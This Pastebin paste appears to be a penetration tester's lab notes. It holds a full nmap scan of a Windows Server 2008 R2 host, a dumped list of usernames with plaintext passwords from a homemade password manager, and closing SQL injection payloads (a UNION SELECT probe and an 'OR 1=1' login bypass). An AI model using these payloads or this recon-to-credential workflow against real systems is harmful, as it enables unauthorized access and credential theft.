SHARE
TWEET

Untitled

a guest Aug 13th, 2016 94 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Nmap scan report for 192.168.32.53
  2. Host is up (0.16s latency).
  3. Not shown: 65513 filtered ports
  4. PORT      STATE SERVICE       VERSION
  5. 21/tcp    open  ftp?
  6. 23/tcp    open  telnet        Microsoft Windows XP telnetd
  7. | telnet-ntlm-info:
  8. |   Target_Name: LOOKAROUNDYOU
  9. |   NetBIOS_Domain_Name: LOOKAROUNDYOU
  10. |   NetBIOS_Computer_Name: LOOKAROUNDYOU
  11. |   DNS_Domain_Name: LookAroundYou
  12. |   DNS_Computer_Name: LookAroundYou
  13. |_  Product_Version: 6.1.7600
  14. 53/tcp    open  domain        Microsoft DNS 6.1.7600
  15. | dns-nsid:
  16. |_  bind.version: Microsoft DNS 6.1.7600 (1DB04228)
  17. 111/tcp   open  rpcbind       2-4 (RPC #100000)
  18. | rpcinfo:
  19. |   program version   port/proto  service
  20. |   100000  2,3,4        111/tcp  rpcbind
  21. |   100000  2,3,4        111/udp  rpcbind
  22. |   100003  2,3         2049/tcp  nfs
  23. |   100003  2,3         2049/udp  nfs
  24. |   100005  1,2,3       1048/tcp  mountd
  25. |   100005  1,2,3       1048/udp  mountd
  26. |   100021  1,2,3,4     1047/tcp  nlockmgr
  27. |   100021  1,2,3,4     1047/udp  nlockmgr
  28. |   100024  1           1039/tcp  status
  29. |_  100024  1           1039/udp  status
  30. 135/tcp   open  msrpc         Microsoft Windows RPC
  31. 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
  32. 445/tcp   open  microsoft-ds  Windows Server 2008 R2 Standard 7600 microsoft-ds
  33. 1039/tcp  open  status        1 (RPC #100024)
  34. 1047/tcp  open  nlockmgr      1-4 (RPC #100021)
  35. 1048/tcp  open  mountd        1-3 (RPC #100005)
  36. 2049/tcp  open  nfs           2-3 (RPC #100003)
  37. 3389/tcp  open  ms-wbt-server Microsoft Terminal Service
  38. | ssl-cert: Subject: commonName=LookAroundYou
  39. | Issuer: commonName=LookAroundYou
  40. | Public Key type: rsa
  41. | Public Key bits: 2048
  42. | Signature Algorithm: sha1WithRSAEncryption
  43. | Not valid before: 2016-01-01T01:14:06
  44. | Not valid after:  2016-07-02T01:14:06
  45. | MD5:   64a8 79d7 4642 23e2 703c 54b6 35a2 0b61
  46. |_SHA-1: ef92 3a34 5132 ec48 d90f aeb5 405a e42c 78cd 6600
  47. |_ssl-date: 2016-01-02T01:18:50+00:00; -224d08h35m12s from scanner time.
  48. 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  49. |_http-server-header: Microsoft-HTTPAPI/2.0
  50. |_http-title: Not Found
  51. 8080/tcp  open  http          Microsoft IIS httpd 7.5
  52. | http-methods:
  53. |   Supported Methods: OPTIONS TRACE GET HEAD POST
  54. |_  Potentially risky methods: TRACE
  55. |_http-server-header: Microsoft-IIS/7.5
  56. |_http-title: Site doesn't have a title (text/html; charset=utf-8).
  57. 47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  58. |_http-server-header: Microsoft-HTTPAPI/2.0
  59. |_http-title: Not Found
  60. 49152/tcp open  msrpc         Microsoft Windows RPC
  61. 49153/tcp open  msrpc         Microsoft Windows RPC
  62. 49154/tcp open  msrpc         Microsoft Windows RPC
  63. 49155/tcp open  msrpc         Microsoft Windows RPC
  64. 49172/tcp open  msrpc         Microsoft Windows RPC
  65. 49173/tcp open  msrpc         Microsoft Windows RPC
  66. 49175/tcp open  msrpc         Microsoft Windows RPC
  67. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  68. SF-Port21-TCP:V=7.25BETA1%I=7%D=8/13%Time=57AEED8F%P=i686-pc-linux-gnu%r(N
  69. SF:ULL,B,"220\x20Hello\r\n")%r(GenericLines,5B,"220\x20Hello\r\n500-'\r\n5
  70. SF:00\x20\x20':\x20command\x20not\x20understood\.\r\n500-'\r\n500\x20\x20'
  71. SF::\x20command\x20not\x20understood\.\r\n")%r(Help,2B0,"220\x20Hello\r\n2
  72. SF:14-The\x20following\x20commands\x20are\x20recognized\x20\(\*\x20==>'s\x
  73. SF:20unimplemented\)\.\r\n\x20\x20\x20\x20ABOR\x20\r\n\x20\x20\x20\x20ACCT
  74. SF:\x20\r\n\x20\x20\x20\x20ADAT\x20\*\r\n\x20\x20\x20\x20ALLO\x20\r\n\x20\
  75. SF:x20\x20\x20APPE\x20\r\n\x20\x20\x20\x20AUTH\x20\r\n\x20\x20\x20\x20CCC\
  76. SF:x20\r\n\x20\x20\x20\x20CDUP\x20\r\n\x20\x20\x20\x20CWD\x20\r\n\x20\x20\
  77. SF:x20\x20DELE\x20\r\n\x20\x20\x20\x20ENC\x20\*\r\n\x20\x20\x20\x20EPRT\x2
  78. SF:0\r\n\x20\x20\x20\x20EPSV\x20\r\n\x20\x20\x20\x20FEAT\x20\r\n\x20\x20\x
  79. SF:20\x20HELP\x20\r\n\x20\x20\x20\x20HOST\x20\r\n\x20\x20\x20\x20LANG\x20\
  80. SF:r\n\x20\x20\x20\x20LIST\x20\r\n\x20\x20\x20\x20MDTM\x20\r\n\x20\x20\x20
  81. SF:\x20MIC\x20\*\r\n\x20\x20\x20\x20MKD\x20\r\n\x20\x20\x20\x20MODE\x20\r\
  82. SF:n\x20\x20\x20\x20NLST\x20\r\n\x20\x20\x20\x20NOOP\x20\r\n\x20\x20\x20\x
  83. SF:20OPTS\x20\r\n\x20\x20\x20\x20PASS\x20\r\n\x20\x20\x20\x20PASV\x20\r\n\
  84. SF:x20\x20\x20\x20PBSZ\x20\r\n\x20\x20\x20\x20PORT\x20\r\n\x20\x20\x20\x20
  85. SF:PROT\x20\r\n\x20\x20\x20\x20PWD\x20\r\n\x20\x20\x20\x20QUIT\x20\r\n\x20
  86. SF:\x20\x20\x20REIN\x20\r\n\x20\x20\x20\x20REST\x20\r\n\x20\x20\x20\x20RET
  87. SF:R\x20\r\n\x20\x20\x20\x20RMD\x20\r\n\x20\x20\x20\x20RNFR\x20\r\n\x20\x2
  88. SF:0\x20\x20RNTO\x20\r\n\x20\x20\x20\x20SITE\x20\r\n\x20\x20\x20\x20SIZE\x
  89. SF:20\r\n\x20\x20\x20\x20SMNT\x20\r\n\x20\x20\x20\x20STAT\x20\r\n\x20\x20\
  90. SF:x20\x20STOR\x20\r\n\x20\x20\x20\x20STOU\x20\r\n\x20\x20\x20\x20STRU\x20
  91. SF:\r\n\x20\x20\x20\x20SYST\x20\r\n\x20\x20\x20\x20TYPE\x20\r\n\x20\x20\x2
  92. SF:0\x20USER\x20\r\n\x20\x20\x20\x20XCUP\x20\r\n\x20\x20\x20\x20XCWD\x20\r
  93. SF:\n\x20\x20\x20\x20XMKD\x20\r\n\x20\x20\x20\x20XPWD\x20\r\n\x20\x20\x20\
  94. SF:x20XRMD\x20\r\n214\x20HELP\x20command\x20successful\.\r\n")%r(GetReques
  95. SF:t,62,"220\x20Hello\r\n500\x20'GET\x20/\x20HTTP/1\.0':\x20command\x20not
  96. SF:\x20understood\.\r\n500-'\r\n500\x20\x20':\x20command\x20not\x20underst
  97. SF:ood\.\r\n")%r(HTTPOptions,66,"220\x20Hello\r\n500\x20'OPTIONS\x20/\x20H
  98. SF:TTP/1\.0':\x20command\x20not\x20understood\.\r\n500-'\r\n500\x20\x20':\
  99. SF:x20command\x20not\x20understood\.\r\n");
  100. MAC Address: 00:50:56:89:0D:EF (VMware)
  101. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  102. Device type: general purpose|phone|specialized
  103. Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|8.1|7|Vista|2012 (92%)
  104. OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
  105. Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%)
  106. No exact OS matches for host (test conditions non-ideal).
  107. Uptime guess: 0.045 days (since Sat Aug 13 11:49:09 2016)
  108. Network Distance: 1 hop
  109. TCP Sequence Prediction: Difficulty=261 (Good luck!)
  110. IP ID Sequence Generation: Incremental
  111. Service Info: OSs: Windows XP, Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows_xp, cpe:/o:microsoft:windows
  112.  
  113. Host script results:
  114. | ms-sql-info:
  115. |   Windows server name: LOOKAROUNDYOU
  116. |   192.168.32.53\SQLEXPRESS:
  117. |     Instance name: SQLEXPRESS
  118. |     Version:
  119. |       Service pack level: SP3
  120. |       Product: Microsoft SQL Server 2008 R2
  121. |       name: Microsoft SQL Server 2008 R2 SP3
  122. |_    Clustered: false
  123. | nbstat: NetBIOS name: LOOKAROUNDYOU, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:89:0d:ef (VMware)
  124. | Names:
  125. |   LOOKAROUNDYOU<00>    Flags: <unique><active>
  126. |   THINC.LOCAL<00>      Flags: <group><active>
  127. |_  LOOKAROUNDYOU<20>    Flags: <unique><active>
  128. | smb-os-discovery:
  129. |   OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
  130. |   OS CPE: cpe:/o:microsoft:windows_server_2008::-
  131. |   Computer name: LookAroundYou
  132. |   NetBIOS computer name: LOOKAROUNDYOU
  133. |   Workgroup: THINC.LOCAL
  134. |_  System time: 2016-01-02T01:18:49+00:00
  135. | smb-security-mode:
  136. |   account_used: guest
  137. |   authentication_level: user
  138. |   challenge_response: supported
  139. |_  message_signing: disabled (dangerous, but default)
  140. |_smbv2-enabled: Server supports SMBv2 protocol
  141.  
  142. TRACEROUTE
  143. HOP RTT       ADDRESS
  144. 1   159.80 ms 192.168.32.53
  145.  
  146.  
  147. Logged In!
  148. Welcome to LookAroundYou's (custom homemade) Password Manager. It's work in progress, so don't expect EVERYTHING to be working correctly.
  149.  
  150.  
  151.  
  152.  
  153. ID: 1
  154. Username: bob
  155. Password: guesswhoisback
  156.  
  157.  
  158.  
  159.  
  160. ID: 2
  161. Username: admin
  162. Password: 10293847561029
  163.  
  164.  
  165.  
  166.  
  167. ID: 3
  168. Username: noah
  169. Password:
  170.  
  171.  
  172.  
  173.  
  174. ID: 4
  175. Username: rob
  176. Password: password1
  177.  
  178.  
  179.  
  180. admin' AND 0=1 UNION SELECT null,null,null,null --
  181.  
  182. SELECT * FROM XXX
  183. SELECT ID, Username, Password from
  184.  
  185. SELECT * FROM WHERE Username = '$usr' AND Password = '$pass'
  186.  
  187. SELECT * FROM WHERE Username = 'admin' OR 1=1 --$usr ' AND Password = '$pass'
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top